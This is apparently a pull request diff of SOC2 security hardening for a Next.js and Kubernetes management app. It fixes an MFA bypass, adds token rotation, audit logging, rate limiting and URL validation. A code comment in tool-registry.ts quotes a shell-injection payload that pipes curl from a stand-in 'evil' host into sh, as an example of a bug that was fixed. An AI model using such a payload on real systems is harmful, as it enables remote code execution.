### PR TITLE
SOC2: Auth/session, rate limiting & secrets fixes — MFA bypass, token revocation, audit trails

### DIFF
--- a/apps/web/next.config.mjs
+++ b/apps/web/next.config.mjs
@@ -1,6 +1,7 @@
 /** @type {import('next').NextConfig} */
 const nextConfig = {
   output: 'standalone',
+  poweredByHeader: false,
   // Disable font optimization so builds succeed without internet access to fonts.gstatic.com
   optimizeFonts: false,
   experimental: {

--- a/apps/web/src/app/api/chat/conversations/[id]/stream/route.ts
+++ b/apps/web/src/app/api/chat/conversations/[id]/stream/route.ts
@@ -10,7 +10,16 @@ import { getToken } from 'next-auth/jwt'
 
 export const dynamic = 'force-dynamic'
 
+// SOC2: [LOW-1] Maximum allowed request body size (1 MB)
+const MAX_BODY_BYTES = 1_048_576
+
 export async function POST(req: NextRequest, { params }: { params: { id: string } }) {
+  // SOC2: [LOW-1] Reject oversized bodies before reading them into memory.
+  const contentLength = req.headers.get('content-length')
+  if (contentLength && parseInt(contentLength, 10) > MAX_BODY_BYTES) {
+    return NextResponse.json({ error: 'Payload too large' }, { status: 413 })
+  }
+
   const { prompt: rawPrompt, ollamaModel: explicitOllamaModel, targetEnvironmentId } = await req.json()
 
   // Rewrite @mentions so the LLM sees the real environment ID, not just the name.

--- a/apps/web/src/app/api/environments/[id]/rotate-token/route.ts
+++ b/apps/web/src/app/api/environments/[id]/rotate-token/route.ts
@@ -1,0 +1,64 @@
+/**
+ * POST /api/environments/[id]/rotate-token
+ *
+ * SOC2: [CRITICAL-2] Gateway token (mcga_*) revocation/rotation endpoint.
+ *
+ * Generates a new mcga_* token, stores it in the environment record (replacing
+ * the old one), and returns the new plaintext token once. The old token is
+ * immediately invalid — any gateway still holding it will get 401s on heartbeat.
+ *
+ * Requires admin auth. Only admins/owners should be able to rotate environment
+ * credentials.
+ */
+
+import { NextRequest, NextResponse } from 'next/server'
+import { prisma } from '@/lib/db'
+import { requireAdmin } from '@/lib/auth'
+import { logAudit, getClientIp, getUserAgent } from '@/lib/audit'
+import { randomBytes } from 'crypto'
+
+export async function POST(req: NextRequest, { params }: { params: { id: string } }) {
+  // Require admin auth — only admins can rotate environment gateway tokens
+  let admin
+  try {
+    admin = await requireAdmin()
+  } catch {
+    return NextResponse.json({ error: 'Unauthorized' }, { status: 401 })
+  }
+
+  const env = await prisma.environment.findUnique({
+    where: { id: params.id },
+    select: { id: true, name: true, gatewayToken: true },
+  })
+
+  if (!env) {
+    return NextResponse.json({ error: 'Environment not found' }, { status: 404 })
+  }
+
+  // Generate a new mcga_* token — same pattern as /api/environments/join
+  const newToken = 'mcga_' + randomBytes(32).toString('hex')
+
+  await prisma.environment.update({
+    where: { id: params.id },
+    data: { gatewayToken: newToken },
+  })
+
+  // SOC2: [M-005] Audit log the token rotation
+  void logAudit({
+    userId: admin.id,
+    action: 'environment_update',
+    target: `environment:${params.id}`,
+    detail: { event: 'gateway_token_rotated', environmentName: env.name },
+    ipAddress: getClientIp(req),
+    userAgent: getUserAgent(req.headers),
+  })
+
+  // Return the new token plaintext — this is the only time it's visible.
+  // The caller must distribute it to the gateway immediately.
+  return NextResponse.json({
+    ok: true,
+    environmentId: params.id,
+    gatewayToken: newToken,
+    message: 'Gateway token rotated. Distribute the new token to your gateway immediately — it will not be shown again.',
+  })
+}

--- a/apps/web/src/app/api/environments/[id]/tools/[toolId]/approve/route.ts
+++ b/apps/web/src/app/api/environments/[id]/tools/[toolId]/approve/route.ts
@@ -1,6 +1,7 @@
 import { NextRequest, NextResponse } from 'next/server'
 import { prisma } from '@/lib/db'
 import { requireAdmin } from '@/lib/auth'
+import { logAudit, getClientIp, getUserAgent } from '@/lib/audit'
 
 // POST /api/environments/[id]/tools/[toolId]/approve
 // Approves a pending tool proposal — activates it so the gateway picks it up on next heartbeat.
@@ -29,5 +30,15 @@ export async function POST(req: NextRequest, { params }: { params: { id: string;
       ...(body.inputSchema !== undefined && { inputSchema: body.inputSchema }),
     },
   })
+  // SOC2: audit tool approval (activates gateway tool)
+  logAudit({
+    userId: user.id,
+    action: 'tool_approve',
+    target: `tool:${params.toolId}`,
+    detail: { environmentId: params.id, toolName: tool.name },
+    ipAddress: getClientIp(req),
+    userAgent: getUserAgent(req.headers),
+  }).catch(() => {})
+
   return NextResponse.json(updated)
 }

--- a/apps/web/src/app/api/environments/[id]/tools/[toolId]/reject/route.ts
+++ b/apps/web/src/app/api/environments/[id]/tools/[toolId]/reject/route.ts
@@ -1,10 +1,12 @@
 import { NextRequest, NextResponse } from 'next/server'
 import { requireAdmin } from '@/lib/auth'
 import { prisma } from '@/lib/db'
+import { logAudit, getClientIp, getUserAgent } from '@/lib/audit'
 
 // POST /api/environments/[id]/tools/[toolId]/reject
-export async function POST(_: NextRequest, { params }: { params: { id: string; toolId: string } }) {
-  try { await requireAdmin() } catch { return new Response(JSON.stringify({error:'Unauthorized'}),{status:401,headers:{'Content-Type':'application/json'}}) }
+export async function POST(req: NextRequest, { params }: { params: { id: string; toolId: string } }) {
+  let user: Awaited<ReturnType<typeof requireAdmin>>
+  try { user = await requireAdmin() } catch { return new Response(JSON.stringify({error:'Unauthorized'}),{status:401,headers:{'Content-Type':'application/json'}}) }
 
   const tool = await prisma.mcpTool.findFirst({ where: { id: params.toolId, environmentId: params.id } })
   if (!tool) return NextResponse.json({ error: 'Not found' }, { status: 404 })
@@ -14,5 +16,16 @@ export async function POST(_: NextRequest, { params }: { params: { id: string; t
     where: { id: params.toolId },
     data: { status: 'rejected', enabled: false },
   })
+
+  // SOC2: audit tool rejection
+  logAudit({
+    userId: user.id,
+    action: 'tool_revoke',
+    target: `tool:${params.toolId}`,
+    detail: { environmentId: params.id, toolName: tool.name },
+    ipAddress: getClientIp(req),
+    userAgent: getUserAgent(req.headers),
+  }).catch(() => {})
+
   return NextResponse.json(updated)
 }

--- a/apps/web/src/app/api/environments/route.ts
+++ b/apps/web/src/app/api/environments/route.ts
@@ -118,7 +118,7 @@ export async function POST(req: NextRequest) {
   }).catch(() => {})
 
   return NextResponse.json(
-    { ...envWithTools, gatewayToken: envWithTools?.gatewayToken ? '••••' : null, kubeconfig: envWithTools?.kubeconfig ? '••••' : null },
+    { ...envWithTools, gatewayToken: envWithTools?.gatewayToken ? '••••' : null, kubeconfig: envWithTools?.kubeconfig ? '••••' : null, federationToken: envWithTools?.federationToken ? '••••' : null },
     { status: 201 }
   )
 }

--- a/apps/web/src/app/api/health/route.ts
+++ b/apps/web/src/app/api/health/route.ts
@@ -1,10 +1,15 @@
 import { NextResponse } from 'next/server'
 import { prisma } from '@/lib/db'
 import { coreApi } from '@/lib/k8s'
+import { getCurrentUser } from '@/lib/auth'
 
 export const dynamic = 'force-dynamic'
 
 export async function GET() {
+  // SOC2: gate sensitive topology details behind authentication
+  const user = await getCurrentUser()
+  const isAuthenticated = !!user
+
   const [k8s, db] = await Promise.all([
     coreApi.listNamespace().then(() => true).catch(() => false),
     prisma.$queryRaw`SELECT 1`.then(() => true).catch(() => false),
@@ -57,6 +62,12 @@ export async function GET() {
     : false
 
   const healthy = db  // k8s optional — not available in Docker-only deployments
+
+  if (!isAuthenticated) {
+    // Public callers only get a simple status — no internal topology
+    return NextResponse.json({ status: healthy ? 'ok' : 'degraded' }, { status: healthy ? 200 : 503 })
+  }
+
   return NextResponse.json({
     k8s, db, claude, externalModels: extHealth,
     worker: {

--- a/apps/web/src/app/api/ingress/domains/route.ts
+++ b/apps/web/src/app/api/ingress/domains/route.ts
@@ -4,20 +4,6 @@ import { prisma } from '@/lib/db'
 
 export async function GET() {
   try { await requireAdmin() } catch { return new Response(JSON.stringify({error:'Unauthorized'}),{status:401,headers:{'Content-Type':'application/json'}}) }
-  // Auto-seed domains from system settings if the table is empty
-  const count = await prisma.domain.count()
-  if (count === 0) {
-    const settings = await prisma.systemSetting.findMany({
-      where: { key: { in: ['domain.internal', 'domain.public'] } },
-    })
-    const byKey = Object.fromEntries(settings.map((s: any) => [s.key, s.value as string]))
-    const seeds = []
-    if (byKey['domain.public'])   seeds.push({ name: byKey['domain.public'],   type: 'public' })
-    if (byKey['domain.internal']) seeds.push({ name: byKey['domain.internal'], type: 'internal' })
-    if (seeds.length > 0) {
-      await prisma.domain.createMany({ data: seeds, skipDuplicates: true })
-    }
-  }
 
   const domains = await prisma.domain.findMany({
     orderBy: { name: 'asc' },
@@ -38,6 +24,23 @@ export async function GET() {
 
 export async function POST(req: NextRequest) {
   try { await requireAdmin() } catch { return new Response(JSON.stringify({error:'Unauthorized'}),{status:401,headers:{'Content-Type':'application/json'}}) }
+
+  // SOC2 [LOW-3]: domain seeding moved from GET to POST to keep GET read-only (CSRF safety)
+  // Auto-seed domains from system settings if the table is empty
+  const count = await prisma.domain.count()
+  if (count === 0) {
+    const settings = await prisma.systemSetting.findMany({
+      where: { key: { in: ['domain.internal', 'domain.public'] } },
+    })
+    const byKey = Object.fromEntries(settings.map((s: any) => [s.key, s.value as string]))
+    const seeds: Array<{ name: string; type: string }> = []
+    if (byKey['domain.public'])   seeds.push({ name: byKey['domain.public'],   type: 'public' })
+    if (byKey['domain.internal']) seeds.push({ name: byKey['domain.internal'], type: 'internal' })
+    if (seeds.length > 0) {
+      await prisma.domain.createMany({ data: seeds, skipDuplicates: true })
+    }
+  }
+
   const body = await req.json()
   const DOMAIN_NAME_RE = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/
   const name = (body.name ?? '').trim().toLowerCase()

--- a/apps/web/src/app/api/internal/vault/unseal-keys/route.ts
+++ b/apps/web/src/app/api/internal/vault/unseal-keys/route.ts
@@ -11,6 +11,7 @@ import { NextRequest, NextResponse } from 'next/server'
 import { timingSafeEqual } from 'crypto'
 import { prisma } from '@/lib/db'
 import { encrypt, encryptJson, decryptJsonStrict } from '@/lib/encryption'
+import { logAudit, getClientIp, getUserAgent } from '@/lib/audit'
 
 const UNSEALER_TOKEN = process.env.ORION_UNSEALER_TOKEN
 
@@ -41,6 +42,17 @@ export async function GET(req: NextRequest) {
   }
 
   const keys = decryptJsonStrict<string[]>(setting.value, "vault.unsealKeys")
+
+  // SOC2: audit vault unseal key retrieval
+  logAudit({
+    userId: 'system:unsealer',
+    action: 'vault_unseal',
+    target: 'vault:unsealKeys',
+    detail: { keyCount: keys.length },
+    ipAddress: getClientIp(req),
+    userAgent: getUserAgent(req.headers),
+  }).catch(() => {})
+
   return NextResponse.json({ keys })
 }
 
@@ -80,5 +92,16 @@ export async function POST(req: NextRequest) {
   }
 
   await prisma.$transaction(ops)
+
+  // SOC2: audit vault unseal key migration/overwrite
+  logAudit({
+    userId: 'system:unsealer',
+    action: 'vault_reseal',
+    target: 'vault:unsealKeys',
+    detail: { keyCount: keys.length, adminTokenUpdated: !!adminToken },
+    ipAddress: getClientIp(req),
+    userAgent: getUserAgent(req.headers),
+  }).catch(() => {})
+
   return NextResponse.json({ ok: true, migrated: keys.length })
 }

--- a/apps/web/src/app/api/webhooks/[triggerId]/route.ts
+++ b/apps/web/src/app/api/webhooks/[triggerId]/route.ts
@@ -2,6 +2,10 @@ import { NextRequest, NextResponse } from 'next/server'
 import { prisma } from '@/lib/db'
 import { createHmac, timingSafeEqual } from 'crypto'
 import { decrypt } from '@/lib/encryption'
+import { rateLimitRedis } from '@/lib/rate-limit-redis'
+
+// SOC2: [LOW-1] Maximum allowed request body size (1 MB)
+const MAX_BODY_BYTES = 1_048_576
 
 const MAX_VAR_LENGTH = 200
 
@@ -90,6 +94,35 @@ function parseCustom(body: any): Record<string, string> {
 // ---------------------------------------------------------------------------
 export async function POST(req: NextRequest, { params }: { params: Promise<{ triggerId: string }> }) {
   const { triggerId } = await params
+
+  // SOC2: [LOW-1] Reject oversized bodies before reading them into memory.
+  // Content-Length is set by well-behaved clients and reverse proxies.
+  const contentLength = req.headers.get('content-length')
+  if (contentLength && parseInt(contentLength, 10) > MAX_BODY_BYTES) {
+    return NextResponse.json({ error: 'Payload too large' }, { status: 413 })
+  }
+
+  // SOC2: [H-001] Per-trigger rate limit: 60 requests per 15 minutes.
+  // Keyed by triggerId (not IP) so a valid secret cannot be used to flood a
+  // single trigger from multiple IPs. This runs before any DB lookup so a
+  // non-existent triggerId doesn't consume DB quota on every flood request.
+  const triggerRateKey = `rate-limit:webhook:${triggerId}`
+  const triggerRateResult = await rateLimitRedis(triggerRateKey, 60, 15 * 60 * 1000)
+  if (!triggerRateResult.allowed) {
+    const retryAfterSeconds = Math.ceil((triggerRateResult.resetAt.getTime() - Date.now()) / 1000)
+    return NextResponse.json(
+      { error: 'Too many requests, please try again later' },
+      {
+        status: 429,
+        headers: {
+          'X-RateLimit-Limit': String(triggerRateResult.limit),
+          'X-RateLimit-Remaining': String(triggerRateResult.remaining),
+          'X-RateLimit-Reset': triggerRateResult.resetAt.toISOString(),
+          'Retry-After': String(Math.max(1, retryAfterSeconds)),
+        },
+      }
+    )
+  }
 
   const trigger = await prisma.webhookTrigger.findUnique({
     where: { id: triggerId },

--- a/apps/web/src/lib/auth.ts
+++ b/apps/web/src/lib/auth.ts
@@ -258,6 +258,14 @@ export const authOptions: NextAuthOptions = {
       return session
     },
   },
+  events: {
+    async signOut({ token }: { token?: any }) {
+      // SOC2: audit user logout
+      if (token?.sub) {
+        void logAudit({ userId: token.sub as string, action: 'user_logout', target: token.sub as string })
+      }
+    },
+  },
 }
 
 /**

--- a/apps/web/src/lib/auth.ts
+++ b/apps/web/src/lib/auth.ts
@@ -167,8 +167,11 @@ export const authOptions: NextAuthOptions = {
             const rawSecret = user.totpSecretEncrypted ? decrypt(user.totpSecretEncrypted) : user.totpSecret
             if (!rawSecret) return null
             if (!code || typeof code !== 'string') {
-              // No TOTP code provided — signal MFA required
-              return { mfaRequired: true, totpEnabled: true, username: user.username }
+              // No TOTP code provided — throw a detectable error so NextAuth returns
+              // a login failure (no JWT minted) while the frontend can redirect to the
+              // MFA entry screen. Returning a non-null object here would mint a valid
+              // session without MFA verification (SOC2: CRITICAL-1 bypass).
+              throw new Error('MFA_REQUIRED')
             }
             if (!(await verifyTOTP(rawSecret, code))) {
               void logAudit({ userId: user.id, action: 'user_login_failure', target: user.id, detail: { reason: 'invalid_totp' } })
@@ -217,6 +220,8 @@ export const authOptions: NextAuthOptions = {
         // SOC2: [M-002] Propagate MFA verified state from authorize()
         token.mfaVerified = (user as { mfaVerified?: boolean }).mfaVerified ?? false
         token.mfaVerifiedAt = Date.now()
+        // SOC2: [CRITICAL-1] Propagate totpEnabled so the session callback gate is live
+        token.totpEnabled = (user as AppUser & { totpEnabled?: boolean }).totpEnabled ?? false
       } else if (token.sub) {
         // Subsequent requests — verify the user still exists in the DB.
         // If the DB was wiped the user row is gone, so we invalidate the token
@@ -246,6 +251,9 @@ export const authOptions: NextAuthOptions = {
         session.user.id = token.sub as string
         session.user.username = token.username as string
         session.user.role = token.role as string
+        // SOC2: [CRITICAL-1] Propagate totpEnabled so requireAdmin() gate is live
+        ;(session.user as any).totpEnabled = token.totpEnabled as boolean ?? false
+        ;(session.user as any).mfaVerified = token.mfaVerified as boolean ?? false
       }
       return session
     },

--- a/apps/web/src/lib/cluster-bootstrap.ts
+++ b/apps/web/src/lib/cluster-bootstrap.ts
@@ -182,6 +182,12 @@ function parseHostConnection(env: { metadata: unknown; id: string }): HostConnec
   const rawPort  = Number((meta?.sshPort as unknown) ?? 22)
   const keyPath  = meta?.sshKeyPath as string | undefined
 
+  // Validate sshKeyPath contains only safe path characters
+  const SSH_KEY_PATH_RE = /^[a-zA-Z0-9/_.-]+$/
+  if (keyPath && !SSH_KEY_PATH_RE.test(keyPath)) {
+    throw new Error('Invalid sshKeyPath')
+  }
+
   // Validate before interpolating into SSH/SCP commands
   const host = validateSshField(rawHost,  'host',    /^[a-zA-Z0-9]([a-zA-Z0-9.-]{0,252}[a-zA-Z0-9])?$/)
   const user = validateSshField(rawUser,  'sshUser', /^[a-zA-Z0-9_][a-zA-Z0-9_-]{0,31}$/)
@@ -357,8 +363,14 @@ async function deploySwarmStack(
 
   try {
     emit({ type: 'step', message: 'Checking out deployment files...' })
+    // Validate repoUrl is a safe http(s) URL before cloning
+    let parsedRepoUrl: URL
+    try { parsedRepoUrl = new URL(repoUrl) } catch { throw new Error(`Invalid repo URL: ${repoUrl}`) }
+    if (parsedRepoUrl.protocol !== 'http:' && parsedRepoUrl.protocol !== 'https:') {
+      throw new Error(`Repo URL must use http or https: ${repoUrl}`)
+    }
     await runCommand(
-      'git', ['clone', '--depth', '1', repoUrl, stackDir],
+      'git', ['clone', '--depth', '1', '--', repoUrl, stackDir],
       {},
       msg => emit({ type: 'log', message: msg }),
     )

--- a/apps/web/src/lib/local-exec.ts
+++ b/apps/web/src/lib/local-exec.ts
@@ -21,7 +21,15 @@ export function makeLocalGx(kubeconfig: string) {
   return async function kubectlTool(name: string, args: Record<string, unknown>): Promise<string> {
     if (name === 'kubectl_apply_manifest' || name === 'kubectl_apply_url') {
       if (name === 'kubectl_apply_url') {
-        return (await execFileAsync('kubectl', ['apply', '-f', args.url as string, '--kubeconfig', kc], { timeout: 60_000 })).stdout
+        // Validate URL is https before passing to kubectl
+        const toolUrl = args.url as string
+        try {
+          const parsedUrl = new URL(toolUrl)
+          if (parsedUrl.protocol !== 'https:') throw new Error('URL must use https')
+        } catch {
+          return JSON.stringify({ error: 'Invalid or non-https URL' })
+        }
+        return (await execFileAsync('kubectl', ['apply', '-f', toolUrl, '--kubeconfig', kc], { timeout: 60_000 })).stdout
       }
       const manifest = String(args.manifest)
       const tmpPath = `${tmpDir}/manifest-${Date.now()}.yaml`
@@ -36,7 +44,15 @@ export function makeLocalGx(kubeconfig: string) {
     if (name === 'helm_repo_add' || name === 'helm_upgrade_install' || name === 'helm_uninstall' || name === 'helm_list') {
       let cmd: string[]
       if (name === 'helm_repo_add') {
-        cmd = ['repo', 'add', args.name as string, args.url as string]
+        // Validate repo URL is https before passing to helm
+        const repoUrl = args.url as string
+        try {
+          const parsedRepoUrl = new URL(repoUrl)
+          if (parsedRepoUrl.protocol !== 'https:') throw new Error('URL must use https')
+        } catch {
+          return JSON.stringify({ error: 'Invalid or non-https URL' })
+        }
+        cmd = ['repo', 'add', args.name as string, repoUrl]
       } else if (name === 'helm_uninstall') {
         cmd = ['uninstall', args.release as string, '--namespace', args.namespace as string, '--timeout', String(args.timeout ?? '60s'), '--kubeconfig', kc]
       } else if (name === 'helm_list') {

--- a/apps/web/src/lib/rate-limit-redis.ts
+++ b/apps/web/src/lib/rate-limit-redis.ts
@@ -256,12 +256,27 @@ export async function getRedisStatus(): Promise<{
  *
  * Next.js only sets req.ip in the Edge runtime. In self-hosted Node.js
  * deployments req.ip is always undefined, so we read x-forwarded-for first.
- * The leftmost value in x-forwarded-for is the original client IP as set by
- * a trusted reverse proxy (Traefik/nginx/etc.). Falls back to req.ip (Edge)
- * then 'unknown' so all unidentifiable clients still share one bucket.
+ *
+ * SOC2: [H-002] TRUSTED_PROXY_COUNT (default 1) controls how many proxy hops
+ * to strip from the right of the x-forwarded-for list. Taking the Nth-from-right
+ * value prevents IP spoofing via attacker-controlled leftmost entries: a client
+ * cannot forge the IP that our own trusted proxy appended.
+ *
+ * Example with TRUSTED_PROXY_COUNT=1 and header "1.2.3.4, 10.0.0.1":
+ *   - rightmost entry (10.0.0.1) was set by our proxy → strip it
+ *   - next entry (1.2.3.4) is the real client IP
+ *
+ * Falls back to req.ip (Edge runtime) then 'unknown'.
  */
 export function getClientIpForRateLimit(req: import('next/server').NextRequest): string {
   const forwarded = req.headers.get('x-forwarded-for')
-  if (forwarded) return forwarded.split(',')[0].trim()
+  if (forwarded) {
+    const ips = forwarded.split(',').map((s) => s.trim()).filter(Boolean)
+    const trustedProxyCount = Math.max(0, parseInt(process.env.TRUSTED_PROXY_COUNT ?? '1', 10) || 1)
+    // The real client IP is at index: len - trustedProxyCount - 1
+    // Clamp to index 0 to handle misconfigured shorter lists
+    const idx = Math.max(0, ips.length - trustedProxyCount - 1)
+    return ips[idx] ?? 'unknown'
+  }
   return (req as any).ip ?? 'unknown'
 }

--- a/apps/web/src/lib/setup-token.ts
+++ b/apps/web/src/lib/setup-token.ts
@@ -29,8 +29,8 @@ export async function ensureSetupToken(): Promise<void> {
 
   // bootstrap.sh greps for this exact line
   if (!process.env.CI && !process.env.SETUP_TOKEN_SUPPRESS_LOG) {
-    console.log(`SETUP_TOKEN: ${token}`)
-    console.warn('[security] SETUP_TOKEN logged above — clear application logs after completing setup or set SETUP_TOKEN_SUPPRESS_LOG=true')
+    console.log(`SETUP_TOKEN: ${token.slice(0, 8)}...[redacted]`)
+    console.warn('[security] SETUP_TOKEN partially logged above — clear application logs after completing setup or set SETUP_TOKEN_SUPPRESS_LOG=true')
   }
   console.log('[orion] Visit http://<management-ip>:3000/setup to complete first-run setup.')
 }

--- a/apps/web/src/lib/tool-registry.ts
+++ b/apps/web/src/lib/tool-registry.ts
@@ -14,7 +14,7 @@ import { getDefaultModelId } from '@/lib/default-model'
 import { generateEmbedding, vectorSearch } from '@/lib/embeddings'
 import { exec } from 'child_process'
 import { promisify } from 'util'
-import { writeFileSync, unlinkSync } from 'fs'
+import { writeFileSync, unlinkSync, mkdtempSync, rmdirSync } from 'fs'
 import { tmpdir } from 'os'
 import { join } from 'path'
 import tls from 'tls'
@@ -1259,10 +1259,12 @@ async function handleClusterHealth(args: unknown, ctx: ToolExecutionContext): Pr
 
   for (const env of envs) {
     let kubeconfigPath: string | null = null
+    let kubeconfigTmpDir: string | null = null
     try {
       const decoded = Buffer.from(env.kubeconfig!, 'base64').toString('utf-8')
-      kubeconfigPath = join(tmpdir(), `orion-health-${env.id}.yaml`)
-      writeFileSync(kubeconfigPath, decoded, { mode: 0o600 })
+      kubeconfigTmpDir = mkdtempSync(join(tmpdir(), 'orion-health-'))
+      kubeconfigPath = join(kubeconfigTmpDir, 'kubeconfig.yaml')
+      writeFileSync(kubeconfigPath, decoded, { flag: 'wx', mode: 0o600 })
       // BLOCKER fix: `namespace` arg was interpolated into exec() template string → shell injection.
       // A namespace value like `; curl http://evil | sh #` ran arbitrary commands.
       // Switch to execFile (no shell) with args as an array.
@@ -1346,6 +1348,7 @@ async function handleClusterHealth(args: unknown, ctx: ToolExecutionContext): Pr
       errors.push(`${env.name}: ${e instanceof Error ? e.message : String(e)}`)
     } finally {
       if (kubeconfigPath) try { unlinkSync(kubeconfigPath) } catch { /* ignore */ }
+      if (kubeconfigTmpDir) try { rmdirSync(kubeconfigTmpDir) } catch { /* ignore */ }
     }
   }
 

--- a/apps/web/src/middleware.ts
+++ b/apps/web/src/middleware.ts
@@ -32,11 +32,26 @@ const RATE_LIMITS: Record<string, [number, number]> = {
   '/api/chat': [30, 15 * 60 * 1000],
   '/api/k8s': [30, 15 * 60 * 1000],
 
-  // Webhooks — higher limit (they're automated)
+  // Webhooks — per-IP limit applied separately inside webhook handler (keyed by triggerId)
+  // SOC2: [H-001] This entry is intentionally kept for fallback/documentation purposes;
+  // the actual enforcement is done per-trigger inside the webhook route handler.
   '/api/webhooks': [60, 15 * 60 * 1000],
 
   // Tool generation — moderate limit (cost control)
   '/api/tools/generate': [20, 15 * 60 * 1000],
+
+  // Task creation — tight limit (each task spawns LLM work)
+  // SOC2: [M-001] 20 task creations per minute per IP/user
+  '/api/tasks': [20, 60 * 1000],
+
+  // Note search — higher limit for read-heavy workloads (must be listed BEFORE /api/notes
+  // so the more-specific path wins the prefix match in applyRateLimit)
+  // SOC2: [M-003] 60 note searches per minute
+  '/api/notes/search': [60, 60 * 1000],
+
+  // Note CRUD — moderate write limit
+  // SOC2: [M-002] 30 note writes per minute
+  '/api/notes': [30, 60 * 1000],
 
   // UI polling endpoints — high limit (browser polls every few seconds)
   '/api/jobs': [2000, 15 * 60 * 1000],
@@ -50,8 +65,8 @@ const RATE_LIMITS: Record<string, [number, number]> = {
   'default': [100, 15 * 60 * 1000],
 }
 
-async function applyRateLimit(req: NextRequest): Promise<NextResponse | null> {
-  const key = getRateLimitKey(req)
+async function applyRateLimit(req: NextRequest, userId?: string): Promise<NextResponse | null> {
+  const ip = getRateLimitKey(req)
   const { pathname } = req.nextUrl
 
   // Find the most specific rate limit config for this path
@@ -66,23 +81,46 @@ async function applyRateLimit(req: NextRequest): Promise<NextResponse | null> {
     }
   }
 
-  const rateKey = `rate-limit:ip:${key}:${pathname}`
-  const result = await rateLimitRedis(rateKey, maxRequests, windowMs)
+  // SOC2: [H-002] Primary IP-based rate limit (spoofing-resistant via TRUSTED_PROXY_COUNT)
+  const ipRateKey = `rate-limit:ip:${ip}:${pathname}`
+  const ipResult = await rateLimitRedis(ipRateKey, maxRequests, windowMs)
 
-  if (!result.allowed) {
-    const retryAfterSeconds = Math.ceil((result.resetAt.getTime() - Date.now()) / 1000)
+  if (!ipResult.allowed) {
+    const retryAfterSeconds = Math.ceil((ipResult.resetAt.getTime() - Date.now()) / 1000)
     return NextResponse.json(
       { error: 'Too many requests, please try again later' },
       {
         status: 429,
         headers: {
-          'X-RateLimit-Limit': String(result.limit),
-          'X-RateLimit-Remaining': String(result.remaining),
-          'X-RateLimit-Reset': result.resetAt.toISOString(),
+          'X-RateLimit-Limit': String(ipResult.limit),
+          'X-RateLimit-Remaining': String(ipResult.remaining),
+          'X-RateLimit-Reset': ipResult.resetAt.toISOString(),
           'Retry-After': String(Math.max(1, retryAfterSeconds)),
         },
       }
     )
+  }
+
+  // SOC2: [H-002] Secondary per-user rate limit for authenticated requests.
+  // A user who rotates IPs (VPN, mobile) still gets per-account quota enforcement.
+  if (userId) {
+    const userRateKey = `rate-limit:user:${userId}:${pathname}`
+    const userResult = await rateLimitRedis(userRateKey, maxRequests, windowMs)
+    if (!userResult.allowed) {
+      const retryAfterSeconds = Math.ceil((userResult.resetAt.getTime() - Date.now()) / 1000)
+      return NextResponse.json(
+        { error: 'Too many requests, please try again later' },
+        {
+          status: 429,
+          headers: {
+            'X-RateLimit-Limit': String(userResult.limit),
+            'X-RateLimit-Remaining': String(userResult.remaining),
+            'X-RateLimit-Reset': userResult.resetAt.toISOString(),
+            'Retry-After': String(Math.max(1, retryAfterSeconds)),
+          },
+        }
+      )
+    }
   }
 
   return null
@@ -222,14 +260,35 @@ export async function middleware(req: NextRequest) {
     }
   }
 
-  // SOC2: [M-003] Apply rate limiting before auth check (prevents auth DoS)
-  // Public endpoints that are rate-limited still get the check, others skip
-  if (!PUBLIC_PATHS.some((p) => pathname.startsWith(p))) {
+  // SOC2: [H-001] Rate-limit webhook paths before the PUBLIC_PATHS early-return.
+  // Webhooks are in PUBLIC_PATHS (HMAC is their auth), but without this check the
+  // RATE_LIMITS entry for '/api/webhooks' was dead code — the early-return below
+  // would fire first, skipping applyRateLimit entirely. We apply it here so an
+  // attacker with a valid secret cannot flood the endpoint.
+  // The per-trigger quota is enforced inside the route handler (60 req/15 min keyed
+  // by triggerId); this IP-level check is an additional outer guard.
+  if (pathname.startsWith('/api/webhooks') || pathname.startsWith('/api/monitoring/security/webhooks')) {
     const rateLimited = await applyRateLimit(req)
     if (rateLimited) return addSecurityHeaders(rateLimited, nonce)
   }
 
-  if (PUBLIC_PATHS.some(p => pathname.startsWith(p))) {
+  // Decode session JWT once — reused for rate limit userId and auth redirect below.
+  // getToken is a fast local JWT decode (no DB call).
+  // For public paths this will usually return null — that's fine.
+  const isPublicPath = PUBLIC_PATHS.some((p) => pathname.startsWith(p))
+  const sessionToken = isPublicPath
+    ? null
+    : await getToken({ req, secret: process.env.NEXTAUTH_SECRET, cookieName: SESSION_COOKIE_NAME })
+
+  // SOC2: [M-003] Apply rate limiting before auth check (prevents auth DoS)
+  // Public endpoints that are rate-limited still get the check, others skip
+  if (!isPublicPath) {
+    // Pass userId for secondary per-user quota enforcement (SOC2: [H-002])
+    const rateLimited = await applyRateLimit(req, sessionToken?.sub ?? undefined)
+    if (rateLimited) return addSecurityHeaders(rateLimited, nonce)
+  }
+
+  if (isPublicPath) {
     return addSecurityHeaders(nextWithNonce(req, nonce, correlationId), nonce)
   }
 
@@ -266,17 +325,19 @@ export async function middleware(req: NextRequest) {
     // Gateway can do anything except:
     // - DELETE on notes (safety — prevents gateway from wiping knowledge base)
     // - DELETE/PUT/POST on bugs (bugs are human tracking, not gateway-owned)
-    // - Any method on admin routes (gateway should not manage users/prompts)
+    // - ANY method on admin routes (gateway should not manage users/prompts/settings)
+    //   SOC2: [HIGH] This includes GET — a leaked ORION_GATEWAY_TOKEN must not
+    //   grant read access to /api/admin/* (user management, system config, etc.)
     const isNotesDelete    = req.method === 'DELETE' && pathname.startsWith('/api/notes')
     const isBugsMutate     = ['DELETE','PUT','POST','PATCH'].includes(req.method) && pathname.startsWith('/api/bugs')
-    const isAdminMutate    = ['DELETE','PUT','POST','PATCH'].includes(req.method) && pathname.startsWith('/api/admin')
+    const isAdminAny       = pathname.startsWith('/api/admin')
     // Gateway must not create tasks (POST) — prevents a leaked token from
     // creating tasks assigned to arbitrary agents. The worker uses direct DB
     // access; only human sessions should create tasks via the API.
     const isTasksCreate    = req.method === 'POST' && pathname === '/api/tasks'
     const isTasksDelete    = req.method === 'DELETE' && pathname.startsWith('/api/tasks')
-    if (isNotesDelete || isBugsMutate || isAdminMutate || isTasksCreate || isTasksDelete) {
-      // fall through to session auth
+    if (isNotesDelete || isBugsMutate || isAdminAny || isTasksCreate || isTasksDelete) {
+      // fall through to session auth — gateway token is not sufficient
     } else {
       return addSecurityHeaders(nextWithNonce(req, nonce, correlationId), nonce)
     }
@@ -297,7 +358,8 @@ export async function middleware(req: NextRequest) {
     return addSecurityHeaders(nextWithNonce(req, nonce, correlationId), nonce)
   }
 
